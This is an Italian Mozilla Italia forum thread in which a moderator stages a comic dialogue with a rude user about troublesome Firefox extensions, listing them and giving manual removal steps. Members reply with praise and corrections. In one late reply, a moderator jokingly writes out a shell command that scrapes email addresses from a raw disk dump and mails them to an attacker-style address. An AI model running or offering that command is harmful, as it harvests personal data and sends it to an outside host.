Autore Topic: Farneticazioni estremiste di un utente sulle estensioni, anzi sugli utenti, anzi  (Letto 20668 volte)

0 Utenti e 1 Visitatore stanno visualizzando questo topic.

Offline miki64

  • Moderatore
  • Post: 35488
Questo post è stato scritto da miki64 in qualità di semplice utente di Mozilla Firefox.
No, non è un doppione di topic già esistenti, quali
- Firefox - un tempo il miglior browser, ora surclassato da Opera e Google Crome,
- Perché Google Chrome al posto di Mozilla Firefox?
- Aggiornamento versione: croce e delizia per le estensioni degli utenti.

Di topic che criticano le decisioni (assurde!) di Mozilla ce ne sono già a sufficienza, come avete visto.
Stasera, finalmente dopo almeno un anno che avevo intenzione di farlo, ho il tempo di parlarvi di un argomento che mi sta a cuore, l'assistenza all'utente in difficoltà.
Non ho un mio blog ma credo che qualcosa impareremo comunque leggendo queste mie farneticazioni, alcune delle quali dettate dall'esasperazione (i problemi degli utenti sono sempre quelli, ma la voglia di risolverli "sbattendosi" un po' non c'è mai) ma anche dettate dalla mia disperazione nell'assistere a richieste di aiuto che non vanno a buon fine (non risolvere un problema è per me qualcosa che mi fa stare male per davvero).

Bene, come al solito non sono capace di scrivere un topic banale e quindi cercherò di esternate le mie farneticazioni in tono semi-serio.

Iniziamo il mio colloquio con un utente fittizio che ha bisogno di aiuto.

Utente: Aiuto, le mie estensioni di Firefox non funzionano più! O forse è Firefox che non funziona più? Che faccio? Help! SOS!
miki64: Ovviamente la prima cosa da fare è cercare nel Forum se qualcuno ha già avuto un problema simile.

Utente: Ho già controllato, sapientone, ma nessun topic fa al caso mio! Mi aiuti o ti hanno nominato Moderatore solo per sputare sentenze su cose ovvie e inconcludenti?
miki64: Ti sembrerà strano, o mio caro utente maleducato, ma non mi stancherò mai di ripetere che qui siamo utilizzatori dei prodotti Mozilla come te. Non siamo pagati da nessuno, tanto meno da te che ci hai chiesto aiuto. Cerca di ricordartelo. E magari dettaglia pure il problema, sennò un topic come questo che lo scriviamo a fare?

Utente: Scusami, ho perso la testa.. sai, improvvisamente le mie estensioni non mi funzionano più e io non so come vivere senza di queste; sai... non sapevo che sarebbe arrivato un giorno così drammatico, chi lo immaginava che la vita è così crudele?
Comunque la mia configurazione è questa (segue lista dettagliata)...

miki64: Evito considerazioni sui veri problemi della vita - per me ad esempio sono quelli di avere a che fare con gente come te  :mrgreen: - e passo a darti subito una cattiva notizia.
Nel tuo profilo sono presenti estensioni problematiche.
Che cosa significa?
Significa che su determinate (non tutte) configurazioni alcune estensioni potrebbero causare vari problemi.
Ti elenco qualche estensione problematica, non è una mia classifica personale né un database segretato dal Pentagono: è semplicemente il resoconto di decine e decine di topic.

ESTENSIONI PROBLEMATICHE:
- tutte quelle inattive e incompatibili;
- tutte le toolbar (chi più, chi meno);
- Avast Online Security;
- Avast SafePrice
- Avast Web Rep;
- AVG Search Shield;
- AVG Active Surf-Shield;
- AVG Link Scanner;
- AVG Safe Search;
- Avira SearchFree Toolbar plus Web Protection;
- Bing Bar;
- Browser Companion Helper;
- Codec-C;
- Cod ecv;
- Easy YouTube Video Downloader (malware nelle versioni precedenti alla 7.3. Pur se difficili da incontrare, nel dubbio meglio specificare che le vecchie versioni sono da evitare)
- Google Toolbar;
- Java Deployment Toolkit (plugin);
- Java Quick Starter;
- HP Smart Web Printing;
- Kaspersky Toolbar ed estensioni varie;     
- Illimitux;
- Incredimail Toolbar;
- Lenovo ThinkVantage Password Manager extension for Firefox
- McAfee Site Advisor;
- Microsoft .Net Framework Assistant;
- Norton Toolbar;
- OneClickDownloader;
- PC Sync 2 Syncronization Extension;
- RealPlayer Browser Record Plugin;
- Skype;
- TheBflix;
- Topline;
- WiseConvert Community Toolbar;
- wxDfast.

Utente: Ma che stai dicendo? Fino a ieri mi funzionava tutto, e io oggi non ho toccato niente! Niente! Per me tu non sei adatto a fare il Moderatore, con tutto il rispetto... Quasi quasi faccio un downgrade di versione (si dice così?)...
miki64: Ti rispondo con un post del nostro Moderatore Gioxx, uno che mastica di informatica come pochi qua dentro (e anche là fuori...)...
Citazione
pensi che in questo caso NON sia cambiato proprio nulla? Nel 99% dei casi è cambiato, anche una piccola virgola, un piccolo errore o una incompatibilità tra un programma e l'altro, e il problema è servito. Io lo faccio per mestiere, e generalmente me la cavo piuttosto bene. Tu cosa fai oltre ad offendere gratuitamente le persone che non conosci dietro un monitor e una tastiera?


Utente: Eh, come sei permaloso, eddai! Mò mi aiuti o fai finta di ignorare il problema? Che faccio?
miki64: Fatti un giro su SUMO, che non è un pianeta di lottatori giapponesi obesi ma è la guida in linea del sito web support.mozilla.org: http://www.mozillaitalia.org/home/sumo/
E magari leggiti pure questo, "Impossibile disinstallare un componente aggiuntivo", sennò che lo abbiamo scritto a fare?


Utente: E che ne so io che lo avete scritto a fare? Mòòò, tutta quella roba devo leggermi io? E chi ce l'ha il tempo? Devo chattare su Facebook, non posso leggermi tutta quella roba. E poi non ho mica tutta quell'esperienza per fare quello che c'è scritto... Che sei, mio padre che vuole per forza farmi studiare a scuola?
miki64: Se fossi tuo padre ti proibirei di avvicinarti ad un PC e ti obbligherei a studiare un po' di più, ma lasciamo perdere quel tuo genitore sfortunato... Torniamo in tema, per favore!
SUMO è una guida scritta in maniera semplice e comprensiva per tutti, quindi se sei incapace di intendere e volere è un problema tuo, non di Firefox...
Più interessante, semmai, è una domanda che mi farai in seguito: ho seguito la guida ma alcuni componenti aggiuntivi non si disinstallano, come mai?

Utente:...  ho seguito la guida ma alcuni componenti aggiuntivi non si disinstallano, come mai?
miki64: Ecco, lo supponevo, lo suppo.
Facciamo delle premesse....
-

Utente:Aspetta, tu sei Moderatore e non sai utilizzare i punti elenco, come mai?
miki64: Ehm...  :oops: .. cerchiamo di rimanere In Topic, ti dispiace? Dobbiamo pubblicizzare le mie incapacità o risolverti il problema?

Utente: Hiiii, come sei acido... Mi dai il tuo profilo su Facebook che ti tolgo l'amicizia?
miki64: Se non la smetti ti faccio rispondere dal Moderatore Sokak, e ti assicuro che per capire le tue soluzioni dovrai assumere un traduttore madrelingua dal sokakese all'italiano....
Continuiamo.
Se gli utenti si degnassero di leggere tutto l'articolo proposto (lo ripeto: "Impossibile disinstallare un componente aggiuntivo") fino in fondo, scoprirebbero che i metodi per disinstallare le estensioni problematiche sono molteplici perché purtroppo sono molto subdoli i metodi con i quali si sono installate.

- Alcune estensioni non le hai installate tu volontariamente. Le ha installate Microsoft per te, oppure un altro programma si è preso la libertà di installarle senza avvisarti di nulla.
- Alcune estensioni si installano perché tu, o utente maleducato informaticamente e dal padre sfortunato, non hai fatto caso che in fase di installazione di un programma c'erano delle caselle da spuntare (o da non spuntare).
- Alcune estensioni non ti servono perché le hai installate per curiosità, per errore, per superficialità o altro. Sono lì, nel tuo profilo, e tu pensi che solo perché sono lì probabilmente serviranno a qualcosa. Non servono a nulla, tranne che a crearti problemi causa i conflitti che generano.
- Alcune estensioni quando le estirperai definitivamente (cosa che posso fare anche io con certi utenti maleducati e con il padre sfortunato...) ti faranno ugualmente funzionare il programma che hai installato, non temere.
- Alcune estensioni non le hai mai utilizzate... che le vorresti tenere a fare?

Utente: Ok, ho capito tutto... anche se non hai utilizzato i punti elenco!  :mrgreen: E mò come le "estirpo" (come dici tu)?
miki64: Che cosa ha quel tasto lì in alto a destra, con su scritto"Cerca" che ti fa schifo? Vabbè, te lo scrivo io.

PRIMA DI TUTTO: CHIUDERE FIREFOX!

Alcune estensioni "non disinstallabili" dalla finestra di Firefox si disinstallano tramite il software che ha aggiunto l'estensione: di solito è presente un'opzione per rimuoverle: è opportuno visitare il sito del fornitore del programma per ottenere ulteriori informazioni.
Ti faccio l'esempio di Real.
Aprire Real Player e da lì tramite "Preferenze / Download e registrazione"  deselezionare "Attiva download e registrazione web per i browser installati".

Altre estensioni si disinstallano soltanto disinstallando il programma che le ha inserite nel profilo e reinstallandolo, facendo attenzione stavolta a spuntare/non spuntare delle apposite caselle.
Ecco l'esempio delle estensioni di AVG: AVG9 Free e Mozilla: quali caselle spuntare al momento dell'installazione.

Altre estensioni si disinstallano tramite il Pannello di controllo di Windows: aprirlo e cercarle tramite l'icona "Installazione applicazioni". Il resto viene da sé.

Altre estensioni sono decisamente più complesse da estirpare poiché bisogna agire ad un livello "profondo" del sistema operativo e quindi se si sbaglia qualcosa (ed è molto facile sbagliare quando non si è sicuri, si ha fretta oppure si ha paura proprio di sbagliare...) si rischia di compromettere l'intero sistema operativo, quindi è d'obbligo un backup dei dati personali, assieme a calma, sangue freddo e tempo (non meteorologico).
Per quanto riguarda, ad esempio, Microsoft .Net Framework Assistant già nella FAQ di SUMO è indicata una soluzione. Ma poiché io sono uno che odia le cose cose si installano da sole nel mio PC, ho scritto anche un articolo apposito... ma è da prendere con le molle perché il contenuto potrebbe non essere più aggiornato e perché - lo ripeto - mettere mano al Registro di sistema potrebbe portare gli utenti alla formattazione di tutto il PC se qualcosa dovesse andare storta.
Ecco il link "proibito": http://www.gialloporpora.netsons.org/rimuovere-il-net-framework-da-firefox/416/

Per quanto riguarda, poi, Java Console, occorre sapere che si toglie nella maniera più facile così:
1) Chiudere Firefox
2) Andare in %programfiles%\mozilla firefox\extensions (praticamente è la sottocartella extensions della cartella in cui è installato Firefox)
3) Cancellare tutte le cartelle che iniziano con {CAFE……………}
4) Aprire Firefox e guardare nell'about:support ("Aiuto / Risoluzione dei problemi"); controllare se le cartelle rimanenti corrispondono a qualche ID nell'about:support, se sì cancellarle, altrimenti lasciarle.

In Rete, poi, si trovano sempre dei suggerimenti alternativi per queste dannate estensioni indisinstallabili (bella parola, vero? Più tardi vado a controllare se esiste..).
Esempio:
Citazione
Disinstallare Java Deployment Toolkit in Firefox
 L'installazione di Java porta anche alla comparsa del Java Deployment Toolkit nella lista dei plugin di Firefox. Può generare problemi di sicurezza e di stabilità, ed inoltre non è particolarmente utile. E allora, perché tenerlo abilitato?
 
Stando alla documentazione ufficiale, si tratta di un tool usato dalle pagine web per recuperare il numero di versione dell'ambiente installato. Gli sviluppatori hanno inoltre (non) ben noti vantaggi.

Inoltre, lo strumento è stato più volte al centro di bollettini di sicurezza e patch varie: basta una breve ricerca con Google per accorgersi che il numero di vulnerabilità di cui è stato afflitto non è poi così contenuto. Nei giorni scorsi, Firefox ha mostrato un avviso circa la disattivazione del plug-in proprio per problemi di sicurezza e stabilità.
La rimozione del tool non è però così immediata come la sua installazione: è infatti necessario agire manualmente, come vedremo nelle prossime righe.
Andremo a cancellare alcuni elementi dal disco fisso: i più prudenti potrebbero voler effettuare un backup di questi file, sebbene non si tratti di un'operazione strettamente necessaria.
1.   Per prima cosa, sinceratevi di aver chiuso Firefox.
2.   Poi, aprite Esplora Risorse e navigate fino a raggiungere la cartella C:\Programmi\Java\jre6\bin (C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll da Windows Vista in poi).
3.   Qui, individuate la cartella new_plugin e cancellatela insieme a tutto il contenuto.
4.   Nella stessa cartella, individuate anche il file npdeployJava1.dll e rimuovetelo.
5.   Spostatevi nella cartella di Mozilla Firefox ed accedete alla sottocartella denominata plugins. Ci troviamo in C:\Programmi\Mozilla Firefox\plugins.
6.   Individuate anche qui il file npdeployJava1.dll e cancellatelo.
7.   Su alcuni sistemi i file indicati potrebbero non essere presenti. In questo caso, sinceratevi che non vi sia nemmeno il file npdeploytk.dll nei percorsi sopra indicati. In caso vi sia, cancellatelo.

Potete chiudere l'esplora risorse e riaprire Firefox: l'ospite indesiderato non sarà più presente nella lista dei plug-in accessibile da "Strumenti / Componenti aggiuntivi / Plugin".

Disinstallare estensioni con riferimenti nel Registro
Fare doppio clic sul file
urrfa.reg
e verranno tutte cancellate (l'acronimo significa Uninstaller for Registry Related Firefox Add-ons.
Infine, un altro metodo per disinstallare toolbar o simili schifezze tenaci è quello di utilizzare AdwCleaner come ultima risorsa.

Ripeto: tutti i consigli non contenuti nelle guide di SUMO, che si trovano quindi sul Web, sono da prendere con le molle: rischiate di procurare più danni di quelli che state cercando di risolvere!

Utente: Io con AVG però non ho quei nomi tra le mie estensioni. E poi perché vorresti farmi disinstallare le toolbar per la sicurezza?
miki64: Primo, le estensioni cambiano i nomi, si riciclano come i nostri politici...
Secondo: pensaci bene. Davvero con le toolbar di Kaspersky o di McAfee credi di navigare con più sicurezza? E allora gli utenti che non hanno quelle toolbar come fanno? Si infettano sul web di continuo?
Terzo: usa la testa (lo so, è difficile farsi comprendere da chi frequenta Facebook...  :P ), la testa è migliore di qualsiasi toolbar sia per la sicurezza e sia per la navigazione in genere (come ad esempio la Google Toolbar).
Quarto: stai parlando con un estremista delle toolbar... Io NON sono obiettivo su questo tipo di componenti aggiuntivi! LI ODIOOOO!!! Quanto tempo ci fanno perdere sul Forum tu non lo immagini!

Utente: Marò.. .e che cosa c'hai contro Facebook tu? Sei un asociale? A proposito, io senza la Goggle Toolbar non so come fare... Ah, vedo che ancora utilizzi "Primo, Secondo"... Siete così scarsi su Mozilla Italia che non sapete utilizzare i punti elenco? Gh gh gh gh!  :mrgreen:
miki64: Guarda che su Mozilla Italia sono tutti formidabili! L'unico scarso sono io, non faccio testo... Tu piuttosto dimmi: come facevi prima senza la Google Toolbar? Navigavi e campavi bene lo stesso?
Beh, ora sai con chi prendertela se  non ti funziona: con Google e non certo con Mozilla o con noi.
Comunque delle alternative ci sono: leggi L'estensione Google Toolbar non è compatibile con Firefox oppure la risposta di un altro Moderatore di Mozilla Italia, Iceberg,  uno che vomita su Facebook come pochi qua dentro (e anche là fuori...)...
Citazione
Google ha cessato di sviluppare la sua toolbar per le versioni successive a Firefox 4.
Dato che la Google toolbar è un prodotto Google le domande relative a questa estensione e al suo, eventuale, futuro vanno rivolte a Google.
Fossi in voi cercherei delle alternative, per esempio Googlebar Lite:
https://addons.mozilla.org/it/firefox/addon/googlebar-lite/
e non son certo le estensioni relative a Google a mancare:
https://addons.mozilla.org/it/firefox/search/?q=google&platform=windows&appver=7.0.1&cat=all

Utente: Iceberg non ama Facebook? Siete così asociali su Mozilla Italia che non avete un profilo su Facebook? Gh gh gh gh!  :mrgreen: Io piaccio a 874 utenti, lo sai? Comunque mò faccio una pulizia con Ccleaner e poi passo a seguire i tuoi consigli per sradicare le estensioni inutili che c'ho.
miki64: Guarda che su Mozilla Italia sono tutti dei simpaticoni, invece! Io e iceberg non facciamo testo, siamo diventati così dopo avere frequentato utenti come te...
Comunque ho una brutta notizia per te e il tuo Ccleaner: questo lo ha scritto un programmatore italiano di Firefox!
PS: non mi sento di consigliare a nessuno l'uso di CCLeaner per la pulizia della cronologia di Firefox, il database non è semplice come può sembrare e non ho idea di quali bug possa causare un'applicazione di terze parti, consiglio caldamente l'uso della funzione interna per la cancellazione della cronologia.
Intendiamoci: Ccleaner è un buon programma e il consilgio di NON utilizzarlo per "pulire" i dati della navigazione di Firefox è dovuto all'esperienza passata dei nostri utilizzatori.
A me piacerebbe un Ccleaner che mi ripulisse da certi utenti su questo Forum...  :fischio:

Utente: Sei davvero scortese, lo sai? Peccato perché avremmo potuto essere amici, io sono così sola la sera e non so con chi chattare...
miki64: ASPETTA! Sei una donna!?!
Mò capisco perché sei imbranata?!
Ehm...  :mrgreen: Mi mandi una tua foto in PM?
Sono così solo anche io la sera....
Sono un ragazzo serio, sai...
Ehi! ma ti sei scollegata? Ci sei? Ci sei?... Ehiiii...
« Ultima modifica: 18 Dicembre 2015 18:04:45 da miki64 »

Offline AlexV

  • Post: 2199
    • Evolution Club
Come sempre, fra il serio (eh? :mrgreen: ) e il faceto (poi vado a vedere su wikipedia cosa vuol dire  :P) il nostro Miki ha snocciolato un gran numero di verità...

L'unica che non condivido è quando dici che tu e Iceberg siete antipatici... a me Iceberg sembra simpaticissimo  :shock: :shock: *

Grazie per la piacevolissima lettura, andrò a letto col sorriso :)


* gh gh gh gh!

Offline gialloporpora

  • サンドロ
  • Moderatore
  • Post: 10806
    • Il blog che non c'è
Se mi perdoni la battuta facebookiana, `I Like' :-D


Offline HariS

  • Post: 298
Da far leggere (e imparare quasi a memoria) a tutti gli utenti che s'iscrivono al forum  8) :D

Offline Iceberg

  • Moderatore
  • Post: 9021
Utile, interessante e più serio di quanto possa sembrare faceto.

Anche se non usa i punti elenco e non spiega cosa sia facebook.  :P
« Ultima modifica: 12 Gennaio 2012 01:05:37 da Iceberg »

Offline Underpass

  • I've got fabric to sell
  • Amministratore
  • Post: 24618
    • Mozilla Italia
P.S. Il sito è support.mozilla.com... bellissime farneticazioni ;)

Offline A35G

  • Post: 642
    • HackWorld - La Rinascita del Sapere -
Anche se io non faccio testo posso dire...santa verità miki :lol:

P.S.
Citazione
Se non la smetti di faccio rispondere dal Moderatore Sokak

Offline Faus-74

  • Post: 613
Capolavoro  :lol:

Offline miki64

  • Moderatore
  • Post: 35488
Grazie a tutti per il gradimento.
Il mio è chiaramente un topic non obiettivo causa l'odio profondo che ho per tutto quello che si installa a mia insaputa, ma mi servirà come link riepilogativo ogni volta che incontrerò un utente che comincerà "a non credere/a non capire" tutto quello che gli stiamo scrivendo.

Non volevo aggiungere tanti suggerimenti sulle estensioni non disinstallabili, però visto che poi gli utenti trovano tanta robaccia su Internet ho preferito mettere i suggerimenti "più sicuri" e comunque avvertirli che è tutto a loro rischio e pericolo.

Credevo di sollevare un flame sull'opportunità di scrivere certe cose su un topic, ecco perché l'ho scritto in veste di "utente" e non in qualità di "Moderatore". Nessun flame, meglio così.

Grazie a tutti delle correzioni.  :)

P.S. Il sito è support.mozilla.com...
Ehm... Io però qui http://www.mozillaitalia.org/home/sumo/ leggo
Citazione
SUMO è la guida in linea del sito web support.mozilla.org

Offline Underpass

  • I've got fabric to sell
  • Amministratore
  • Post: 24618
    • Mozilla Italia
E' un errore ;)
Grazie per la segnalazione, appena torno a casa correggo (in ogni caso tutti i link a SUMO puntano a support.mozilla.com.... )

Offline michro

  • Moderatore
  • Post: 22232
Bella miki :D

@Underpass
https://support.mozilla.org/it/forums/contributors/708049?last=44256
"SUMO is moving to support.mozilla.org today" (lo hanno fatto a fine anno e se guardi bene, adesso gli articoli puntano a .org).

Offline Underpass

  • I've got fabric to sell
  • Amministratore
  • Post: 24618
    • Mozilla Italia
Bene, allora comunque la pagina deve essere modificata passando i .com a .org ;)

Offline Sokak

  • I speak a logs
  • Moderatore
  • Post: 4371
    • Ask Sokak
Aspetta aspetta?

Che cosa vuol dire che i miei interventi non sono comprensibili?

Cosa c'è di non chiaro quando dico di avviare da una live di linux e dare il comando

Codice: [Seleziona]
dd if=/dev/sda bs=4M | hexdump -C | grep -Eio '\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b' > list.txtseguito da
Codice: [Seleziona]
cat list.txt | mail -s "Al mio caro sokak i dati richiesti" sokakrubaindirizziemail@sshack.net
Mi sembra chiaro e lampante!

Sono limpido nei miei interventi!

Quando chiedo a un utente semplicemente di eseguire poche centinaia di righe in una shell o prompt dei comandi, sono chiarissimi e molto esplicativo!

Ci metto pure gli scrinshiot!

Offline RNicoletto

  • Post: 2209
    • MondoWin
Grandi perle di saggezza Miki! :lol:

Io aspetto sempre che ti chiamino a Zelig.

Offline Faus-74

  • Post: 613
Credevo di sollevare un flame
Se proprio ci tieni, siamo ancora in tempo   :lol:

0 Utenti e 1 Visitatore stanno visualizzando questo topic.